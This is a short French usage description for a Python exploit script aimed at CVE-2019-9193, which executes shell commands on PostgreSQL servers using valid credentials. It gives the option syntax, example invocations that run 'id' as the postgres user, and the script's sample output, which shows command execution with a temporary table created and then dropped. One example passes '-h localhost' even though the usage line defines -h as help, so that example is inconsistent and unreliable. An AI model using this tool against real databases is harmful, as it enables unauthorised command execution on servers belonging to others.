
Script d'exploitation Python pour CVE-2019-9193, permettant l'exécution de code à distance sur des bases de données PostgreSQL vulnérables via une injection de commande authentifiée.
usage : CVE-2019-9193.py [-h] [-i [IP]] [-p [PORT]] [-d [DATABASE]] [-c [COMMAND]] [-t [TIMEOUT]] [-U [USER]] [-P [PASSWORD]]
exemple : python3 CVE-2019-9193.py -i 127.0.0.1 -p 5432 -U postgres -c 'id'
exemple 2 : python3 CVE-2019-9193.py -h localhost -p 5432 -U postgres -c 'id'
sortie :
[+] Connexion à la base de données PostgreSQL sur 127.0.0.1:5432 [+] Connexion à la base de données établie [+] Vérification de la version de PostgreSQL [+] PostgreSQL 9.3 est probablement vulnérable [+] Création de la table _30e173ba7fa5577a86b9e9ecfea13360 [+] Commande exécutée
uid=999(postgres) gid=999(postgres) groups=999(postgres),103(ssl-cert)
[+] Suppression de la table _30e173ba7fa5577a86b9e9ecfea13360